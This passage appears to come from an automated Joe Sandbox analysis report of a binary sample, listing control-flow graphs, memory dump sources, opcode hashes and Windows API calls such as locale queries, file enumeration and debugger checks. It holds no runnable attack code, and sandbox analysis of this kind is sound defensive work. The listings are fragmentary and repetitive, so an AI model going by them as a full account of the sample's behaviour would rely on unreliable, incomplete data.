                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5dd4130b9feccc0caa488ef7944327e0cffa98aa781fe9f813801b29cb45d008
                                                                                                                                                                                                                                              • Instruction ID: abe02e483ac62b0f8a9eeb5b983860daa8f1d2fa2329ae287d1bc281f2c8cb44
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dd4130b9feccc0caa488ef7944327e0cffa98aa781fe9f813801b29cb45d008
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA31EA7252012BBFCF15CFA8E9808EDB7B9BF08320B140225E511E3A80E731F954CB91

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 382 23b97d-23b9a7 383 23b9a9-23b9ab 382->383 384 23b9ad-23b9af 382->384 385 23b9fe-23ba01 383->385 386 23b9b1-23b9b3 384->386 387 23b9b5-23b9bc call 23b8b2 384->387 386->385 389 23b9c1-23b9c5 387->389 390 23b9c7-23b9d5 GetProcAddress 389->390 391 23b9e4-23b9fb 389->391 390->391 392 23b9d7-23b9e2 call 23132f 390->392 393 23b9fd 391->393 392->393 393->385
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4039ea3ae4f91e196627dae81d38d64807cb1629c8761c3e4e0fa3980d4acdb0
                                                                                                                                                                                                                                              • Instruction ID: ef2db355d605cc58bb49f4708889183e7416a6f380639a1b949c426953587ab7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4039ea3ae4f91e196627dae81d38d64807cb1629c8761c3e4e0fa3980d4acdb0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E901F5736303199F9B038E69FC49A2A33AAFBC5731B644124FB0087154EB309C208B94

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 396 22aef7-22aef8 397 22aefc 396->397 398 22af4a-22af50 397->398 399 22aefe-22af04 call 2313b8 397->399 401 22af52 398->401 402 22aed5 398->402 405 22afa0-22afa8 401->405 406 22af54-22af5c 401->406 402->397 403 22aed7-22aee4 402->403 408 22afaa-22afad 405->408 409 22afce-22afd6 405->409 408->409 412 22afaf-22afb3 408->412 410 22afeb-22affb 409->410 411 22afd8-22afe9 call 237f3a 409->411 416 22b000-22b00e call 22986f 410->416 411->410 415 22affd 411->415 414 22afb5-22afbb call 22a866 412->414 412->415 423 22afc0-22afcc 414->423 415->416 423->416
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3988221542-0
                                                                                                                                                                                                                                              • Opcode ID: b5b88b61e1075f514a7686f82aae800ddaa99ec07c9fdebfe6f3f66811a80460
                                                                                                                                                                                                                                              • Instruction ID: d7d7186d97b9a780a15fd4bd8fb880621c577df48072d91c399e24ae4fefac1b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5b88b61e1075f514a7686f82aae800ddaa99ec07c9fdebfe6f3f66811a80460
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9101F9B766C27B2BDB15DEB8F9156A8BB10EF86334F2441AFD011C8CC2DA175471D612

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 425 23a8d1-23a8dd 426 23a90f-23a91a call 236211 425->426 427 23a8df-23a8e1 425->427 435 23a91c-23a91e 426->435 428 23a8e3-23a8e4 427->428 429 23a8fa-23a90b RtlAllocateHeap 427->429 428->429 431 23a8e6-23a8ed call 236dd1 429->431 432 23a90d 429->432 431->426 437 23a8ef-23a8f8 call 23439c 431->437 432->435 437->426 437->429
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,0023C8AA,?,?,0023C8AA,00000220,?,00000000,?), ref: 0023A903
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: 19e4f05f7e909e649e72a1a7f853efc9c06a19127acdb8cdbbf5c74bc5666548
                                                                                                                                                                                                                                              • Instruction ID: dc056c13b56bb711c41306ce88a8377e107c346860eb2d2427585fdf6d22706e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19e4f05f7e909e649e72a1a7f853efc9c06a19127acdb8cdbbf5c74bc5666548
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FE0E5B113032666D7206F61AC09B5B7A589F427F0F124031EC85B7090EE60CD7186A2
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: GetLastError.KERNEL32(?,?,00233FBA,00254C30,0000000C), ref: 0023AB27
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: SetLastError.KERNEL32(00000000), ref: 0023ABC9
                                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0023FCDA
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0023FD18
                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0023FD2B
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0023FD73
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0023FD8E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                              • String ID: l#%
                                                                                                                                                                                                                                              • API String ID: 415426439-1260472432
                                                                                                                                                                                                                                              • Opcode ID: b9409c8954d07699b4f2d8d02bbce888bd570f13008256a262bd9fe8caba0fa8
                                                                                                                                                                                                                                              • Instruction ID: d1aba0faf34b52430b2da69562b5266d8ca43c1e2bd3da071beeab26615abcac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9409c8954d07699b4f2d8d02bbce888bd570f13008256a262bd9fe8caba0fa8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66517FB2E2020AAFDF51DFA5ED45ABAB7B8FF04701F04447AE901E7191E7709D608B61
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,0023FD08,00000002,00000000,?,?,?,0023FD08,?,00000000), ref: 002403D0
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,0023FD08,00000002,00000000,?,?,?,0023FD08,?,00000000), ref: 002403F9
                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,0023FD08,?,00000000), ref: 0024040E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                              • Opcode ID: 4711fbdecce08e71b696ca5f893d6d3b8123cacb02c6868fd96eff5f13a18153
                                                                                                                                                                                                                                              • Instruction ID: 3607185362b69787539f3fcae801306e22a4790441d240fe2431702df1dd7bd6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4711fbdecce08e71b696ca5f893d6d3b8123cacb02c6868fd96eff5f13a18153
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A21CB32A30202A7D73DCF24D885A9B7FA6AF54B54B5680B4EB0AD7111E732DED1C390
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c833190d3595b4907967d4d4129b7b381ff8ffd123d7f024cd91791e4d9d99b7
                                                                                                                                                                                                                                              • Instruction ID: d9bc898946f9306035358f56dbc86089230a692f1bc291e899106b41a16c2939
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c833190d3595b4907967d4d4129b7b381ff8ffd123d7f024cd91791e4d9d99b7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D023DB1E1121A9FDF14CFA8D8806ADF7F5FF48314F24826AE515EB380DB31A9518B90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00240A09
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                                                                                                              • Opcode ID: 05901a4bada57251cd8f3ab7eb27ab5d2913d8ecf53904341f8d9900cd13a3ba
                                                                                                                                                                                                                                              • Instruction ID: f5d83bbc420a9728384a5b52309c370292087bf9e9632e02ab9214bb21036c68
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05901a4bada57251cd8f3ab7eb27ab5d2913d8ecf53904341f8d9900cd13a3ba
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4771D3719152699FDF29EF24CCCDAAEBBB8EB45304F1441D9E249A3211DA304ED58F14
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0022D87B
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0022D947
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0022D960
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0022D96A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                                                                                              • Opcode ID: 17441f0f4182c9501f9ea5754de5c91f3b4729addcd9c729e4828a36eacc39da
                                                                                                                                                                                                                                              • Instruction ID: 87318b0b3a2002fb6552fe8fae9d92df701c15a6ed94edbb7873bcfc33b0b26a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17441f0f4182c9501f9ea5754de5c91f3b4729addcd9c729e4828a36eacc39da
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A310C75D153299BDF21DFA4E8497CDBBB4AF08700F1041AAE40CA7250E7709B85CF45
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: GetLastError.KERNEL32(?,?,00233FBA,00254C30,0000000C), ref: 0023AB27
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: SetLastError.KERNEL32(00000000), ref: 0023ABC9
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0023FF12
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0023FF5C
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00240022
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 661929714-0
                                                                                                                                                                                                                                              • Opcode ID: a756017dc5e6fdb8e1a689e7639aca76488efd7772e5d8ef4f0154f77dcbd4ef
                                                                                                                                                                                                                                              • Instruction ID: b02987819aa6e3377a77cc3e7d843ca67698b41c2780a2ce4e22c0bb5840cbb2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a756017dc5e6fdb8e1a689e7639aca76488efd7772e5d8ef4f0154f77dcbd4ef
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F61AF719302079FDB689F28DD82BBA77A8EF04300F148179EE05D6685EB74D9A1DF50
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00236A55
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00236A5F
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00236A6C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                                              • Opcode ID: 8b6ff22aa6e2093a0971a0cfc33d460dbabd02200541fd8cdf4a1257224c7824
                                                                                                                                                                                                                                              • Instruction ID: 6c868da033bee31f99b3d4ef6f869d21fe6034c436822120f7ab78286b26afc7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b6ff22aa6e2093a0971a0cfc33d460dbabd02200541fd8cdf4a1257224c7824
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6231E5B4911329ABCB21DF68DC8978CBBB8BF08750F5081EAE40CA7250E7309F958F44
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0023BC50: HeapAlloc.KERNEL32(00000008,?,?,?,0023AB70,00000001,00000364,?,00000005,000000FF,?,00233FBA,00254C30,0000000C), ref: 0023BC91
                                                                                                                                                                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00240A09
                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00240AFD
                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00240B3C
                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00240B6F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2701053895-0
                                                                                                                                                                                                                                              • Opcode ID: 6f9decdf66dc9b4df15599601926adf2ecd5b01e926b53e5a9470be8c111bb86
                                                                                                                                                                                                                                              • Instruction ID: 32a5867ef8eedb64dc2616b3d50d7772ff60771a4ad8479629ae0135fe461fca
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f9decdf66dc9b4df15599601926adf2ecd5b01e926b53e5a9470be8c111bb86
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8051797192021DAFEF18AF389CC5ABE77B9DF85704F1441ADF55893202EA308DA18F60
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: GetLastError.KERNEL32(?,?,00233FBA,00254C30,0000000C), ref: 0023AB27
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: SetLastError.KERNEL32(00000000), ref: 0023ABC9
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002401C4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
